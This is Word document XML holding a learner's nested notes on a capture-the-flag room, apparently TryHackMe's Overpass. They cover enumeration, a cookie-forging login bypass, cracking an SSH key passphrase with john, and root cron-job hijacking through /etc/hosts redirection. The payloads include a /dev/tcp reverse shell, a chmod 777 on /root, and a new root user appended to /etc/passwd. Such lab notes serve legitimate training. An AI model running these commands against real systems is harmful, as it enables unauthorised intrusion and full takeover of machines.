    <w:p w14:paraId="3327DBDA" w14:textId="3058FD52" w:rsidR="00895D94" w:rsidRDefault="00895D94" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="64"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Enumeration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60FB0A74" w14:textId="45E54DEB" w:rsidR="00895D94" w:rsidRDefault="00895D94" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="64"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Nmap</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08EB0F3C" w14:textId="258C93A3" w:rsidR="00895D94" w:rsidRDefault="00895D94" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="64"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Gobuster</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D088E36" w14:textId="758CDE06" w:rsidR="00895D94" w:rsidRDefault="00895D94" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="64"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Exploitation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="382E74C8" w14:textId="78E65F64" w:rsidR="00895D94" w:rsidRDefault="00895D94" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="64"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Admin Login Page</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38E66BE7" w14:textId="10D5BE27" w:rsidR="00895D94" w:rsidRDefault="00895D94" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="64"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Broken Authentication Using Cookies via Login.js script</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72EC99BC" w14:textId="2C2831CF" w:rsidR="00895D94" w:rsidRDefault="00895D94" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="64"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Review how login() function works</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D0BA718" w14:textId="74D91E53" w:rsidR="00895D94" w:rsidRDefault="00895D94" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="64"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>input variables (username, password, loginStatus) are combined and passed into a variable statusOrCookies</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="486D480B" w14:textId="436D4BA8" w:rsidR="00895D94" w:rsidRDefault="00895D94" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="64"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>compared with Incorrect Credentials string</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52FC4066" w14:textId="538ADB5B" w:rsidR="00895D94" w:rsidRDefault="00895D94" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="6"/>
          <w:numId w:val="64"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>if matched – Incorrect Credentials value is assigned to loginStatus and passwordBox is made empty</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="110E060E" w14:textId="63A87E4F" w:rsidR="00895D94" w:rsidRDefault="00895D94" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="6"/>
          <w:numId w:val="64"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>if not match – statusOrCookies value is assigned as the cookie value but is not validated</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="520284A0" w14:textId="293EA893" w:rsidR="00895D94" w:rsidRDefault="00895D94" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="64"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>can set cookie value to anything other than the string “Incorrect Credentials” and get access without username or password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63D5E3D8" w14:textId="6A8D26C3" w:rsidR="00895D94" w:rsidRDefault="00895D94" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="6"/>
          <w:numId w:val="64"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>set cookie value in Console Tab of Inspect Element</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4414FF8D" w14:textId="14769584" w:rsidR="00895D94" w:rsidRDefault="00895D94" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="7"/>
          <w:numId w:val="64"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Cookies.set(“SessionToken”, ‘myCookieValue’)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2452B1A3" w14:textId="083D0B19" w:rsidR="00895D94" w:rsidRDefault="00895D94" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="8"/>
          <w:numId w:val="64"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>the wording will be code specific</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28DF7172" w14:textId="201D93AE" w:rsidR="00895D94" w:rsidRDefault="00895D94" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="7"/>
          <w:numId w:val="64"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>refresh page for successful login</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29B7430B" w14:textId="1A48E706" w:rsidR="00895D94" w:rsidRDefault="00895D94" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="64"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>RSA Private Key Bypass</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79D3912A" w14:textId="590FCC18" w:rsidR="00895D94" w:rsidRDefault="00895D94" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="64"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>copy RSA Private Key</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E159348" w14:textId="2F4FB876" w:rsidR="00895D94" w:rsidRDefault="00895D94" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="64"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">convert into John-readable file via python /usr/share/john/ssh2john.py </w:t>
      </w:r>
      <w:r w:rsidR="00693B96">
        <w:t>&lt;rsa_file&gt; &gt; cracked.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20646581" w14:textId="3F04912B" w:rsidR="00693B96" w:rsidRDefault="00693B96" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="64"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>use john to break cracked.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D41F3DA" w14:textId="17F643F3" w:rsidR="00693B96" w:rsidRDefault="00693B96" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="64"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>john –wordlist=/usr/share/wordlists/rockyou.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D998DDA" w14:textId="71286FA0" w:rsidR="00693B96" w:rsidRDefault="00693B96" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="64"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Login via ssh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="374F399F" w14:textId="34793833" w:rsidR="00693B96" w:rsidRDefault="00693B96" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="64"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>ssh -i rsa_file &lt;username&gt;@&lt;ip&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="296DBBC5" w14:textId="5E0E3ACE" w:rsidR="00693B96" w:rsidRDefault="00693B96" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="64"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>enter passphrase</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62F2C893" w14:textId="42BA10E3" w:rsidR="00693B96" w:rsidRDefault="00693B96" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="64"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>PrivEsc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7726A5D5" w14:textId="45A1847B" w:rsidR="00693B96" w:rsidRDefault="00693B96" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="64"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Linpeas</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60642BF6" w14:textId="426B86B7" w:rsidR="00693B96" w:rsidRDefault="00693B96" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="64"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>copy raw data over via python -m SimpleHTTPServer 8080 and run on victim machine</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="321BF692" w14:textId="6FFE5755" w:rsidR="00693B96" w:rsidRDefault="00693B96" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="64"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>CronJobs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B694919" w14:textId="716CF507" w:rsidR="00693B96" w:rsidRDefault="00693B96" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="64"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>***** indicates continuous function, unless time format specifically notated</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C01141C" w14:textId="02D4EECD" w:rsidR="00693B96" w:rsidRDefault="00693B96" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="64"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>root &lt;CronJob&gt; | bash means results of CronJob are piped to root via bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DD9DF2D" w14:textId="0CEF7086" w:rsidR="00693B96" w:rsidRDefault="00693B96" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="64"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>can execute commands as root</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58BC81AC" w14:textId="744F6AB5" w:rsidR="00693B96" w:rsidRDefault="00693B96" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="64"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>check /etc/hosts file for IP addresses for CronJob function</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25BD9DFD" w14:textId="728A6B3D" w:rsidR="00693B96" w:rsidRDefault="00693B96" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="64"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>rewrite IP address to point to attacker</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43410563" w14:textId="4265F456" w:rsidR="00693B96" w:rsidRDefault="00693B96" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="64"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Copy directory path of CronJob script</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C5B6D85" w14:textId="6F330488" w:rsidR="00693B96" w:rsidRDefault="00693B96" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="64"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>on attacker machine create matching pathway</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1341C833" w14:textId="631A245D" w:rsidR="00693B96" w:rsidRDefault="00693B96" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="64"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>ex.</w:t>
      </w:r>
      <w:r w:rsidR="00BA6E37">
        <w:t xml:space="preserve"> (on victim machine)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ***** root curl cronjob/downloads/src/script | bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66F248F5" w14:textId="3F9286FF" w:rsidR="00693B96" w:rsidRDefault="00BA6E37" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="64"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">(on attacker machine) </w:t>
      </w:r>
      <w:r w:rsidR="00693B96">
        <w:t xml:space="preserve">mkdir </w:t>
      </w:r>
      <w:r>
        <w:t>-p downloads/src</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26A3833A" w14:textId="18595431" w:rsidR="00BA6E37" w:rsidRDefault="00BA6E37" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="6"/>
          <w:numId w:val="64"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>cd downloads/src</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35FFA35C" w14:textId="7CF1FC0B" w:rsidR="00BA6E37" w:rsidRDefault="00BA6E37" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="7"/>
          <w:numId w:val="64"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>touch same_script_name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A5F204A" w14:textId="3765F79B" w:rsidR="00BA6E37" w:rsidRDefault="00BA6E37" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="7"/>
          <w:numId w:val="64"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>input commands or shells to be executed in this new script</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DD8CD93" w14:textId="455F8CDA" w:rsidR="00BA6E37" w:rsidRDefault="00BA6E37" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="8"/>
          <w:numId w:val="64"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>#!/bin/bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DAB6514" w14:textId="0703F858" w:rsidR="00BA6E37" w:rsidRDefault="00BA6E37" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="8"/>
          <w:numId w:val="64"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>cat /root/root.txt &gt; /tmp/flag</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E5B015D" w14:textId="45DA3619" w:rsidR="00BA6E37" w:rsidRDefault="00BA6E37" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="7"/>
          <w:numId w:val="64"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>or create a reverse shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6176E56D" w14:textId="77777777" w:rsidR="00BA6E37" w:rsidRDefault="00BA6E37" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="8"/>
          <w:numId w:val="64"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>chmod -R 777 /root/;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F5A3592" w14:textId="74F69982" w:rsidR="00BA6E37" w:rsidRDefault="00BA6E37" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="8"/>
          <w:numId w:val="64"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>bash -i &gt;&amp; /dev/tcp/your_thm_ip/some_port_to_listen_on 0&gt;&amp;1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="336C050A" w14:textId="600ED216" w:rsidR="00BA6E37" w:rsidRDefault="00BA6E37" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="7"/>
          <w:numId w:val="64"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>or create new root user</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3012E603" w14:textId="3E3B0733" w:rsidR="00BA6E37" w:rsidRDefault="00BA6E37" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="8"/>
          <w:numId w:val="64"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00BA6E37">
        <w:t>echo "root2:`openssl passwd toor`:0:0:root:/root:/bin/bash" &gt;&gt; /etc/passwd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="798FFB20" w14:textId="117F893C" w:rsidR="00BA6E37" w:rsidRDefault="00BA6E37" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="64"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>create flag file in victim /tmp folder with general permissions</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="64C07DFD" w14:textId="6862A490" w:rsidR="00BA6E37" w:rsidRDefault="00BA6E37" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="64"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>touch flag</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="498CD5C8" w14:textId="4ABA1B41" w:rsidR="00BA6E37" w:rsidRDefault="00BA6E37" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="64"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>chmod 777 flag</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D3A4C57" w14:textId="60B45AC3" w:rsidR="00BA6E37" w:rsidRDefault="00BA6E37" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="64"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>on attacker machine run sudo python3 -m http.server 80 command</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="020AD5FE" w14:textId="0605A277" w:rsidR="00BA6E37" w:rsidRDefault="00BA6E37" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="64"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>wait for GET with 200 code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21365EF6" w14:textId="274CE47A" w:rsidR="00BA6E37" w:rsidRDefault="00BA6E37" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="64"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>on victim machine cat flag file for new malicious output</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BE5E347" w14:textId="7D3B1EEC" w:rsidR="00BA6E37" w:rsidRDefault="00BA6E37" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="64"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>If reverse shell input</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="601E47C2" w14:textId="4F4BECB3" w:rsidR="00BA6E37" w:rsidRDefault="00BA6E37" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="6"/>
          <w:numId w:val="64"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>create netcat listener</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EC47C46" w14:textId="0B469D34" w:rsidR="00694056" w:rsidRDefault="00694056" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="64"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Overpass II</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F097AB4" w14:textId="60D44808" w:rsidR="001668E9" w:rsidRDefault="001668E9" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="64"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Wireshark</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ABF9387" w14:textId="26135E80" w:rsidR="00694056" w:rsidRDefault="00615782" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="64"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>PCAP Analysis</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="501D20C7" w14:textId="3F90F7FC" w:rsidR="00615782" w:rsidRDefault="00615782" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="64"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>GET request for URLs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3786455B" w14:textId="0115747E" w:rsidR="00615782" w:rsidRDefault="00615782" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="64"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>POST request for uploads</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F22AE03" w14:textId="26A8C793" w:rsidR="00615782" w:rsidRDefault="00615782" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="64"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">examine payload </w:t>
      </w:r>
      <w:r>
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> printable text</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33FD074E" w14:textId="2FAF8008" w:rsidR="00615782" w:rsidRDefault="00615782" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="64"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>investigate links to determine method of compromise</w:t>
      </w:r>
    </w:p>
